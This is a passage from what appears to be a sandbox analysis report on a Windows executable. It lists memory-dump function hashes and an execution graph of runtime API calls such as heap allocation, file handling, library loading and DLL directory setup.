                                                                                                                                                                                                                                                    Function 0100D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2162027005.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_100d000_4A64.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 8a3a7bd0c4704d668fb12c6a76f6de9212e70c5ab93c339d99508f587138e560
                                                                                                                                                                                                                                                    • Instruction ID: ca0f718d2384f0cc96463640debe96073a36cfd3aaa529d753dea9d567b1594e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a3a7bd0c4704d668fb12c6a76f6de9212e70c5ab93c339d99508f587138e560
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04210671504200DFEB16DF98D5C0B16BBA5EB84354F20C5ADE98D4B286C336D407CB71
                                                                                                                                                                                                                                                    Function 00FFD10B Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2161938909.0000000000FFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFD000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_ffd000_4A64.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                                                                                                                                                                    • Instruction ID: 57c8c3dda73055c7a13fc5ee41f6d524ed48dc01b87a180ff88e2fe1851139ef
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0112672904244CFDB12CF00D9C0B26BF72FF94324F24C1A9D9094B266C33AD85ADBA1
                                                                                                                                                                                                                                                    Function 0100D017 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2162027005.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_100d000_4A64.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                                                                                                                                                    • Instruction ID: 82673a4c7e70fff1fb41989cfc3d58291e0aade8c95627cc83855999abc1bcc3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8119075504280DFDB16CF94D5C4B15FFA2FB44314F24C6AAE84D4B696C33AD44ACB62
                                                                                                                                                                                                                                                    Function 00FFDA51 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2161938909.0000000000FFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFD000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_ffd000_4A64.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 128acff5f4294b909b4f89dbcefd50ae03e504af46a8f50676351891b26330b3
                                                                                                                                                                                                                                                    • Instruction ID: 55a6a2069e8cf4f2ac8a8f1c3f2c3c99cac83f5f4e37a78adfe8a8a42b5707ab
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 128acff5f4294b909b4f89dbcefd50ae03e504af46a8f50676351891b26330b3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D01F77250C3489AE7149E25C8C0B36BF99DF50374F18C55AEE494A2A3C63C9C40E6B9
                                                                                                                                                                                                                                                    Function 00FFDA50 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2161938909.0000000000FFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFD000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_ffd000_4A64.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 4c79164f6d80a82b250fcc319c6f33662ebb05cb3e2015d6cae7f266df899ba1
                                                                                                                                                                                                                                                    • Instruction ID: f6106495158eb9e579cb2410d4d56e890ee999a1c2843fb9dfb6f79d114ae639
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c79164f6d80a82b250fcc319c6f33662ebb05cb3e2015d6cae7f266df899ba1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7BF0C2728083449EE7108A15C9C4B62FFD8EF50334F18C55AEE084F293C2789C44CAB0

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:9.6%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:0.6%
                                                                                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                                                                                    Total number of Limit Nodes:63
                                                                                                                                                                                                                                                    execution_graph 15629 7ff69f3eae00 15630 7ff69f3eae2e 15629->15630 15631 7ff69f3eae15 15629->15631 15631->15630 15634 7ff69f3fc90c 15631->15634 15635 7ff69f3fc957 15634->15635 15639 7ff69f3fc91b _get_daylight 15634->15639 15644 7ff69f3f43f4 15635->15644 15636 7ff69f3fc93e HeapAlloc 15638 7ff69f3eae8e 15636->15638 15636->15639 15639->15635 15639->15636 15641 7ff69f4028a0 15639->15641 15647 7ff69f4028e0 15641->15647 15653 7ff69f3fa5d8 GetLastError 15644->15653 15646 7ff69f3f43fd 15646->15638 15652 7ff69f3ff5e8 EnterCriticalSection 15647->15652 15654 7ff69f3fa619 FlsSetValue 15653->15654 15658 7ff69f3fa5fc 15653->15658 15655 7ff69f3fa62b 15654->15655 15659 7ff69f3fa609 SetLastError 15654->15659 15670 7ff69f3fdea8 15655->15670 15658->15654 15658->15659 15659->15646 15661 7ff69f3fa658 FlsSetValue 15664 7ff69f3fa664 FlsSetValue 15661->15664 15665 7ff69f3fa676 15661->15665 15662 7ff69f3fa648 FlsSetValue 15663 7ff69f3fa651 15662->15663 15677 7ff69f3f9c58 15663->15677 15664->15663 15683 7ff69f3fa204 15665->15683 15676 7ff69f3fdeb9 _get_daylight 15670->15676 15671 7ff69f3fdf0a 15674 7ff69f3f43f4 _get_daylight 10 API calls 15671->15674 15672 7ff69f3fdeee HeapAlloc 15673 7ff69f3fa63a 15672->15673 15672->15676 15673->15661 15673->15662 15674->15673 15675 7ff69f4028a0 _get_daylight 2 API calls 15675->15676 15676->15671 15676->15672 15676->15675 15678 7ff69f3f9c8c 15677->15678 15679 7ff69f3f9c5d RtlFreeHeap 15677->15679 15678->15659 15679->15678 15680 7ff69f3f9c78 GetLastError 15679->15680 15681 7ff69f3f9c85 Concurrency::details::SchedulerProxy::DeleteThis 15680->15681 15682 7ff69f3f43f4 _get_daylight 9 API calls 15681->15682 15682->15678 15688 7ff69f3fa0dc 15683->15688 15700 7ff69f3ff5e8 EnterCriticalSection 15688->15700 19900 7ff69f40a10e 19901 7ff69f40a127 19900->19901 19902 7ff69f40a11d 19900->19902 19904 7ff69f3ff648 LeaveCriticalSection 19902->19904 18341 7ff69f3f8c79 18342 7ff69f3f96e8 45 API calls 18341->18342 18343 7ff69f3f8c7e 18342->18343 18344 7ff69f3f8ca5 GetModuleHandleW 18343->18344 18345 7ff69f3f8cef 18343->18345 18344->18345 18350 7ff69f3f8cb2 18344->18350 18353 7ff69f3f8b7c 18345->18353 18350->18345 18367 7ff69f3f8da0 GetModuleHandleExW 18350->18367 18373 7ff69f3ff5e8 EnterCriticalSection 18353->18373 18368 7ff69f3f8dd4 GetProcAddress 18367->18368 18369 7ff69f3f8dfd 18367->18369 18370 7ff69f3f8de6 18368->18370 18371 7ff69f3f8e02 FreeLibrary 18369->18371 18372 7ff69f3f8e09 18369->18372 18370->18369 18371->18372 18372->18345 19265 7ff69f40a079 19268 7ff69f3f4788 LeaveCriticalSection 19265->19268 19906 7ff69f3f4720 19907 7ff69f3f472b 19906->19907 19915 7ff69f3fe5b4 19907->19915 19928 7ff69f3ff5e8 EnterCriticalSection 19915->19928 19308 7ff69f3fec9c 19309 7ff69f3fee8e 19308->19309 19312 7ff69f3fecde _isindst 19308->19312 19310 7ff69f3f43f4 _get_daylight 11 API calls 19309->19310 19328 7ff69f3fee7e 19310->19328 19311 7ff69f3eb870 _log10_special 8 API calls 19313 7ff69f3feea9 19311->19313 19312->19309 19314 7ff69f3fed5e _isindst 19312->19314 19329 7ff69f4054a4 19314->19329 19319 7ff69f3feeba 19321 7ff69f3f9c10 _isindst 17 API calls 19319->19321 19323 7ff69f3feece 19321->19323 19326 7ff69f3fedbb 19326->19328 19353 7ff69f4054e8 19326->19353 19328->19311 19330 7ff69f4054b3 19329->19330 19331 7ff69f3fed7c 19329->19331 19360 7ff69f3ff5e8 EnterCriticalSection 19330->19360 19335 7ff69f4048a8 19331->19335 19336 7ff69f4048b1 19335->19336 19337 7ff69f3fed91 19335->19337 19338 7ff69f3f43f4 _get_daylight 11 API calls 19336->19338 19337->19319 19341 7ff69f4048d8 19337->19341 19339 7ff69f4048b6 19338->19339 19340 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 19339->19340 19340->19337 19342 7ff69f4048e1 19341->19342 19343 7ff69f3feda2 19341->19343 19344 7ff69f3f43f4 _get_daylight 11 API calls 19342->19344 19343->19319 19347 7ff69f404908 19343->19347 19345 7ff69f4048e6 19344->19345 19346 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 19345->19346 19346->19343 19348 7ff69f404911 19347->19348 19352 7ff69f3fedb3 19347->19352 19349 7ff69f3f43f4 _get_daylight 11 API calls 19348->19349 19350 7ff69f404916 19349->19350 19351 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 19350->19351 19351->19352 19352->19319 19352->19326 19361 7ff69f3ff5e8 EnterCriticalSection 19353->19361 19933 7ff69f3fb830 19944 7ff69f3ff5e8 EnterCriticalSection 19933->19944 19980 7ff69f4009c0 19991 7ff69f4066f4 19980->19991 19992 7ff69f406701 19991->19992 19993 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19992->19993 19994 7ff69f40671d 19992->19994 19993->19992 19995 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19994->19995 19996 7ff69f4009c9 19994->19996 19995->19994 19997 7ff69f3ff5e8 EnterCriticalSection 19996->19997 18394 7ff69f3f4938 18395 7ff69f3f4952 18394->18395 18396 7ff69f3f496f 18394->18396 18397 7ff69f3f43d4 _fread_nolock 11 API calls 18395->18397 18396->18395 18398 7ff69f3f4982 CreateFileW 18396->18398 18399 7ff69f3f4957 18397->18399 18400 7ff69f3f49ec 18398->18400 18401 7ff69f3f49b6 18398->18401 18403 7ff69f3f43f4 _get_daylight 11 API calls 18399->18403 18445 7ff69f3f4f14 18400->18445 18419 7ff69f3f4a8c GetFileType 18401->18419 18406 7ff69f3f495f 18403->18406 18410 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 18406->18410 18408 7ff69f3f49f5 18413 7ff69f3f4368 _fread_nolock 11 API calls 18408->18413 18409 7ff69f3f4a20 18466 7ff69f3f4cd4 18409->18466 18415 7ff69f3f496a 18410->18415 18411 7ff69f3f49e1 CloseHandle 18411->18415 18412 7ff69f3f49cb CloseHandle 18412->18415 18418 7ff69f3f49ff 18413->18418 18418->18415 18420 7ff69f3f4ada 18419->18420 18421 7ff69f3f4b97 18419->18421 18424 7ff69f3f4b06 GetFileInformationByHandle 18420->18424 18425 7ff69f3f4e10 21 API calls 18420->18425 18422 7ff69f3f4bc1 18421->18422 18423 7ff69f3f4b9f 18421->18423 18429 7ff69f3f4be4 PeekNamedPipe 18422->18429 18444 7ff69f3f4b82 18422->18444 18426 7ff69f3f4bb2 GetLastError 18423->18426 18427 7ff69f3f4ba3 18423->18427 18424->18426 18428 7ff69f3f4b2f 18424->18428 18430 7ff69f3f4af4 18425->18430 18433 7ff69f3f4368 _fread_nolock 11 API calls 18426->18433 18431 7ff69f3f43f4 _get_daylight 11 API calls 18427->18431 18432 7ff69f3f4cd4 51 API calls 18428->18432 18429->18444 18430->18424 18430->18444 18431->18444 18435 7ff69f3f4b3a 18432->18435 18433->18444 18434 7ff69f3eb870 _log10_special 8 API calls 18436 7ff69f3f49c4 18434->18436 18483 7ff69f3f4c34 18435->18483 18436->18411 18436->18412 18439 7ff69f3f4c34 10 API calls 18440 7ff69f3f4b59 18439->18440 18441 7ff69f3f4c34 10 API calls 18440->18441 18442 7ff69f3f4b6a 18441->18442 18443 7ff69f3f43f4 _get_daylight 11 API calls 18442->18443 18442->18444 18443->18444 18444->18434 18446 7ff69f3f4f4a 18445->18446 18447 7ff69f3f43f4 _get_daylight 11 API calls 18446->18447 18465 7ff69f3f4fe2 __std_exception_destroy 18446->18465 18448 7ff69f3f4f5c 18447->18448 18451 7ff69f3f43f4 _get_daylight 11 API calls 18448->18451 18449 7ff69f3eb870 _log10_special 8 API calls 18450 7ff69f3f49f1 18449->18450 18450->18408 18450->18409 18452 7ff69f3f4f64 18451->18452 18453 7ff69f3f7118 45 API calls 18452->18453 18454 7ff69f3f4f79 18453->18454 18455 7ff69f3f4f81 18454->18455 18456 7ff69f3f4f8b 18454->18456 18457 7ff69f3f43f4 _get_daylight 11 API calls 18455->18457 18458 7ff69f3f43f4 _get_daylight 11 API calls 18456->18458 18461 7ff69f3f4f86 18457->18461 18459 7ff69f3f4f90 18458->18459 18460 7ff69f3f43f4 _get_daylight 11 API calls 18459->18460 18459->18465 18462 7ff69f3f4f9a 18460->18462 18463 7ff69f3f4fd4 GetDriveTypeW 18461->18463 18461->18465 18464 7ff69f3f7118 45 API calls 18462->18464 18463->18465 18464->18461 18465->18449 18467 7ff69f3f4cfc 18466->18467 18475 7ff69f3f4a2d 18467->18475 18490 7ff69f3fea34 18467->18490 18469 7ff69f3f4d90 18470 7ff69f3fea34 51 API calls 18469->18470 18469->18475 18471 7ff69f3f4da3 18470->18471 18472 7ff69f3fea34 51 API calls 18471->18472 18471->18475 18473 7ff69f3f4db6 18472->18473 18474 7ff69f3fea34 51 API calls 18473->18474 18473->18475 18474->18475 18476 7ff69f3f4e10 18475->18476 18477 7ff69f3f4e2a 18476->18477 18478 7ff69f3f4e61 18477->18478 18479 7ff69f3f4e3a 18477->18479 18480 7ff69f3fe8c8 21 API calls 18478->18480 18481 7ff69f3f4368 _fread_nolock 11 API calls 18479->18481 18482 7ff69f3f4e4a 18479->18482 18480->18482 18481->18482 18482->18418 18484 7ff69f3f4c50 18483->18484 18485 7ff69f3f4c5d FileTimeToSystemTime 18483->18485 18484->18485 18488 7ff69f3f4c58 18484->18488 18486 7ff69f3f4c71 SystemTimeToTzSpecificLocalTime 18485->18486 18485->18488 18486->18488 18487 7ff69f3eb870 _log10_special 8 API calls 18489 7ff69f3f4b49 18487->18489 18488->18487 18489->18439 18491 7ff69f3fea41 18490->18491 18492 7ff69f3fea65 18490->18492 18491->18492 18493 7ff69f3fea46 18491->18493 18494 7ff69f3fea9f 18492->18494 18498 7ff69f3feabe 18492->18498 18495 7ff69f3f43f4 _get_daylight 11 API calls 18493->18495 18497 7ff69f3f43f4 _get_daylight 11 API calls 18494->18497 18496 7ff69f3fea4b 18495->18496 18499 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 18496->18499 18500 7ff69f3feaa4 18497->18500 18501 7ff69f3f4178 45 API calls 18498->18501 18502 7ff69f3fea56 18499->18502 18503 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 18500->18503 18505 7ff69f3feacb 18501->18505 18502->18469 18504 7ff69f3feaaf 18503->18504 18504->18469 18505->18504 18506 7ff69f3ff7ec 51 API calls 18505->18506 18506->18505 19678 7ff69f3f9060 19681 7ff69f3f8fe4 19678->19681 19688 7ff69f3ff5e8 EnterCriticalSection 19681->19688 20119 7ff69f3fa2e0 20120 7ff69f3fa2e5 20119->20120 20121 7ff69f3fa2fa 20119->20121 20125 7ff69f3fa300 20120->20125 20126 7ff69f3fa342 20125->20126 20127 7ff69f3fa34a 20125->20127 20128 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20126->20128 20129 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20127->20129 20128->20127 20130 7ff69f3fa357 20129->20130 20131 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20130->20131 20132 7ff69f3fa364 20131->20132 20133 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20132->20133 20134 7ff69f3fa371 20133->20134 20135 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20134->20135 20136 7ff69f3fa37e 20135->20136 20137 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20136->20137 20138 7ff69f3fa38b 20137->20138 20139 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20138->20139 20140 7ff69f3fa398 20139->20140 20141 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20140->20141 20142 7ff69f3fa3a5 20141->20142 20143 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20142->20143 20144 7ff69f3fa3b5 20143->20144 20145 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20144->20145 20146 7ff69f3fa3c5 20145->20146 20151 7ff69f3fa1a4 20146->20151 20165 7ff69f3ff5e8 EnterCriticalSection 20151->20165 15702 7ff69f3ebf5c 15723 7ff69f3ec12c 15702->15723 15705 7ff69f3ec0a8 15846 7ff69f3ec44c IsProcessorFeaturePresent 15705->15846 15706 7ff69f3ebf78 __scrt_acquire_startup_lock 15708 7ff69f3ec0b2 15706->15708 15714 7ff69f3ebf96 __scrt_release_startup_lock 15706->15714 15709 7ff69f3ec44c 7 API calls 15708->15709 15711 7ff69f3ec0bd __CxxCallCatchBlock 15709->15711 15710 7ff69f3ebfbb 15712 7ff69f3ec041 15729 7ff69f3ec594 15712->15729 15714->15710 15714->15712 15835 7ff69f3f8e44 15714->15835 15715 7ff69f3ec046 15732 7ff69f3e1000 15715->15732 15720 7ff69f3ec069 15720->15711 15842 7ff69f3ec2b0 15720->15842 15724 7ff69f3ec134 15723->15724 15725 7ff69f3ec140 __scrt_dllmain_crt_thread_attach 15724->15725 15726 7ff69f3ebf70 15725->15726 15727 7ff69f3ec14d 15725->15727 15726->15705 15726->15706 15727->15726 15853 7ff69f3ecba8 15727->15853 15880 7ff69f4097e0 15729->15880 15731 7ff69f3ec5ab GetStartupInfoW 15731->15715 15733 7ff69f3e1009 15732->15733 15882 7ff69f3f4794 15733->15882 15735 7ff69f3e352b 15889 7ff69f3e33e0 15735->15889 15742 7ff69f3e356c 15744 7ff69f3e1bf0 49 API calls 15742->15744 15743 7ff69f3e3736 16089 7ff69f3e3f70 15743->16089 15760 7ff69f3e3588 15744->15760 15747 7ff69f3e3785 15749 7ff69f3e25f0 53 API calls 15747->15749 15826 7ff69f3e3538 15749->15826 15751 7ff69f3e365f __std_exception_destroy 15758 7ff69f3e7e10 14 API calls 15751->15758 15791 7ff69f3e3834 15751->15791 15752 7ff69f3e3778 15753 7ff69f3e379f 15752->15753 15754 7ff69f3e377d 15752->15754 15756 7ff69f3e1bf0 49 API calls 15753->15756 16108 7ff69f3ef36c 15754->16108 15757 7ff69f3e37be 15756->15757 15768 7ff69f3e18f0 115 API calls 15757->15768 15761 7ff69f3e36ae 15758->15761 15951 7ff69f3e7e10 15760->15951 15964 7ff69f3e7f80 15761->15964 15762 7ff69f3e3852 15764 7ff69f3e3865 15762->15764 15765 7ff69f3e3871 15762->15765 16115 7ff69f3e3fe0 15764->16115 15767 7ff69f3e1bf0 49 API calls 15765->15767 15788 7ff69f3e3805 __std_exception_destroy 15767->15788 15770 7ff69f3e37df 15768->15770 15769 7ff69f3e36bd 15771 7ff69f3e380f 15769->15771 15772 7ff69f3e36cf 15769->15772 15770->15760 15775 7ff69f3e37ef 15770->15775 15973 7ff69f3e8400 15771->15973 15969 7ff69f3e1bf0 15772->15969 15779 7ff69f3e25f0 53 API calls 15775->15779 15778 7ff69f3e389e SetDllDirectoryW 15784 7ff69f3e38c3 15778->15784 15779->15826 15782 7ff69f3e36fc 16069 7ff69f3e25f0 15782->16069 15786 7ff69f3e3a50 15784->15786 16029 7ff69f3e6560 15784->16029 15789 7ff69f3e3a5a PostMessageW GetMessageW 15786->15789 15790 7ff69f3e3a7d 15786->15790 16024 7ff69f3e86b0 15788->16024 15789->15790 16173 7ff69f3e3080 15790->16173 15791->15788 16112 7ff69f3e3e90 15791->16112 15794 7ff69f3e38ea 15795 7ff69f3e3947 15794->15795 15797 7ff69f3e3901 15794->15797 16118 7ff69f3e65a0 15794->16118 15795->15786 15802 7ff69f3e395c 15795->15802 15810 7ff69f3e3905 15797->15810 16139 7ff69f3e6970 15797->16139 16049 7ff69f3e30e0 15802->16049 15806 7ff69f3e6780 FreeLibrary 15807 7ff69f3e3aa3 15806->15807 15810->15795 16155 7ff69f3e2870 15810->16155 16080 7ff69f3eb870 15826->16080 15836 7ff69f3f8e7c 15835->15836 15837 7ff69f3f8e5b 15835->15837 18292 7ff69f3f96e8 15836->18292 15837->15712 15840 7ff69f3ec5d8 GetModuleHandleW 15841 7ff69f3ec5e9 15840->15841 15841->15720 15843 7ff69f3ec2c1 15842->15843 15844 7ff69f3ec080 15843->15844 15845 7ff69f3ecba8 7 API calls 15843->15845 15844->15710 15845->15844 15847 7ff69f3ec472 __CxxCallCatchBlock __scrt_get_show_window_mode 15846->15847 15848 7ff69f3ec491 RtlCaptureContext RtlLookupFunctionEntry 15847->15848 15849 7ff69f3ec4ba RtlVirtualUnwind 15848->15849 15850 7ff69f3ec4f6 __scrt_get_show_window_mode 15848->15850 15849->15850 15851 7ff69f3ec528 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15850->15851 15852 7ff69f3ec576 __CxxCallCatchBlock 15851->15852 15852->15708 15854 7ff69f3ecbb0 15853->15854 15855 7ff69f3ecbba 15853->15855 15859 7ff69f3ecf44 15854->15859 15855->15726 15860 7ff69f3ecf53 15859->15860 15861 7ff69f3ecbb5 15859->15861 15867 7ff69f3ed180 15860->15867 15863 7ff69f3ecfb0 15861->15863 15864 7ff69f3ecfdb 15863->15864 15865 7ff69f3ecfbe DeleteCriticalSection 15864->15865 15866 7ff69f3ecfdf 15864->15866 15865->15864 15866->15855 15871 7ff69f3ecfe8 15867->15871 15877 7ff69f3ed0d2 TlsFree 15871->15877 15878 7ff69f3ed02c __vcrt_InitializeCriticalSectionEx 15871->15878 15872 7ff69f3ed05a LoadLibraryExW 15874 7ff69f3ed07b GetLastError 15872->15874 15875 7ff69f3ed0f9 15872->15875 15873 7ff69f3ed119 GetProcAddress 15873->15877 15874->15878 15875->15873 15876 7ff69f3ed110 FreeLibrary 15875->15876 15876->15873 15878->15872 15878->15873 15878->15877 15879 7ff69f3ed09d LoadLibraryExW 15878->15879 15879->15875 15879->15878 15881 7ff69f4097d0 15880->15881 15881->15731 15881->15881 15885 7ff69f3fe790 15882->15885 15883 7ff69f3fe7e3 16186 7ff69f3f9b24 15883->16186 15885->15883 15886 7ff69f3fe836 15885->15886 16196 7ff69f3fe668 15886->16196 15888 7ff69f3fe80c 15888->15735 16242 7ff69f3ebb70 15889->16242 15892 7ff69f3e341b 16249 7ff69f3e29e0 15892->16249 15893 7ff69f3e3438 16244 7ff69f3e85a0 FindFirstFileExW 15893->16244 15897 7ff69f3e34a5 16268 7ff69f3e8760 15897->16268 15898 7ff69f3e344b 16259 7ff69f3e8620 CreateFileW 15898->16259 15900 7ff69f3eb870 _log10_special 8 API calls 15902 7ff69f3e34dd 15900->15902 15902->15826 15911 7ff69f3e18f0 15902->15911 15904 7ff69f3e34b3 15907 7ff69f3e26c0 49 API calls 15904->15907 15909 7ff69f3e342e 15904->15909 15905 7ff69f3e3474 __vcrt_InitializeCriticalSectionEx 15905->15897 15906 7ff69f3e345c 16262 7ff69f3e26c0 15906->16262 15907->15909 15909->15900 15912 7ff69f3e3f70 108 API calls 15911->15912 15913 7ff69f3e1925 15912->15913 15914 7ff69f3e1bb6 15913->15914 15916 7ff69f3e76a0 83 API calls 15913->15916 15915 7ff69f3eb870 _log10_special 8 API calls 15914->15915 15917 7ff69f3e1bd1 15915->15917 15918 7ff69f3e196b 15916->15918 15917->15742 15917->15743 15950 7ff69f3e199c 15918->15950 16666 7ff69f3ef9f4 15918->16666 15919 7ff69f3ef36c 74 API calls 15919->15914 15921 7ff69f3e1985 15922 7ff69f3e19a1 15921->15922 15923 7ff69f3e1989 15921->15923 16670 7ff69f3ef6bc 15922->16670 16673 7ff69f3e2760 15923->16673 15927 7ff69f3e19bf 15929 7ff69f3e2760 53 API calls 15927->15929 15928 7ff69f3e19d7 15930 7ff69f3e19ee 15928->15930 15931 7ff69f3e1a06 15928->15931 15929->15950 15933 7ff69f3e2760 53 API calls 15930->15933 15932 7ff69f3e1bf0 49 API calls 15931->15932 15934 7ff69f3e1a1d 15932->15934 15933->15950 15935 7ff69f3e1bf0 49 API calls 15934->15935 15936 7ff69f3e1a68 15935->15936 15937 7ff69f3ef9f4 73 API calls 15936->15937 15938 7ff69f3e1a8c 15937->15938 15939 7ff69f3e1aa1 15938->15939 15940 7ff69f3e1ab9 15938->15940 15941 7ff69f3e2760 53 API calls 15939->15941 15942 7ff69f3ef6bc _fread_nolock 53 API calls 15940->15942 15941->15950 15943 7ff69f3e1ace 15942->15943 15944 7ff69f3e1ad4 15943->15944 15945 7ff69f3e1aec 15943->15945 15947 7ff69f3e2760 53 API calls 15944->15947 16690 7ff69f3ef430 15945->16690 15947->15950 15949 7ff69f3e25f0 53 API calls 15949->15950 15950->15919 15952 7ff69f3e7e1a 15951->15952 15953 7ff69f3e86b0 2 API calls 15952->15953 15954 7ff69f3e7e39 GetEnvironmentVariableW 15953->15954 15955 7ff69f3e7ea2 15954->15955 15956 7ff69f3e7e56 ExpandEnvironmentStringsW 15954->15956 15958 7ff69f3eb870 _log10_special 8 API calls 15955->15958 15956->15955 15957 7ff69f3e7e78 15956->15957 15959 7ff69f3e8760 2 API calls 15957->15959 15960 7ff69f3e7eb4 15958->15960 15961 7ff69f3e7e8a 15959->15961 15960->15751 15962 7ff69f3eb870 _log10_special 8 API calls 15961->15962 15963 7ff69f3e7e9a 15962->15963 15963->15751 15965 7ff69f3e86b0 2 API calls 15964->15965 15966 7ff69f3e7f94 15965->15966 16899 7ff69f3f7548 15966->16899 15968 7ff69f3e7fa6 __std_exception_destroy 15968->15769 15970 7ff69f3e1c15 15969->15970 15971 7ff69f3f3ca4 49 API calls 15970->15971 15972 7ff69f3e1c38 15971->15972 15972->15782 15972->15788 15974 7ff69f3e8415 15973->15974 16917 7ff69f3e7b50 GetCurrentProcess OpenProcessToken 15974->16917 15977 7ff69f3e7b50 7 API calls 15978 7ff69f3e8441 15977->15978 15979 7ff69f3e8474 15978->15979 15980 7ff69f3e845a 15978->15980 15982 7ff69f3e2590 48 API calls 15979->15982 15981 7ff69f3e2590 48 API calls 15980->15981 15983 7ff69f3e8472 15981->15983 15984 7ff69f3e8487 LocalFree LocalFree 15982->15984 15983->15984 15985 7ff69f3e84a3 15984->15985 15987 7ff69f3e84af 15984->15987 16927 7ff69f3e2940 15985->16927 15988 7ff69f3eb870 _log10_special 8 API calls 15987->15988 16025 7ff69f3e86d2 MultiByteToWideChar 16024->16025 16026 7ff69f3e86f6 16024->16026 16025->16026 16028 7ff69f3e870c __std_exception_destroy 16025->16028 16027 7ff69f3e8713 MultiByteToWideChar 16026->16027 16026->16028 16027->16028 16028->15778 16030 7ff69f3e6575 16029->16030 16031 7ff69f3e38d5 16030->16031 16032 7ff69f3e2760 53 API calls 16030->16032 16033 7ff69f3e6b00 16031->16033 16032->16031 16034 7ff69f3e6b30 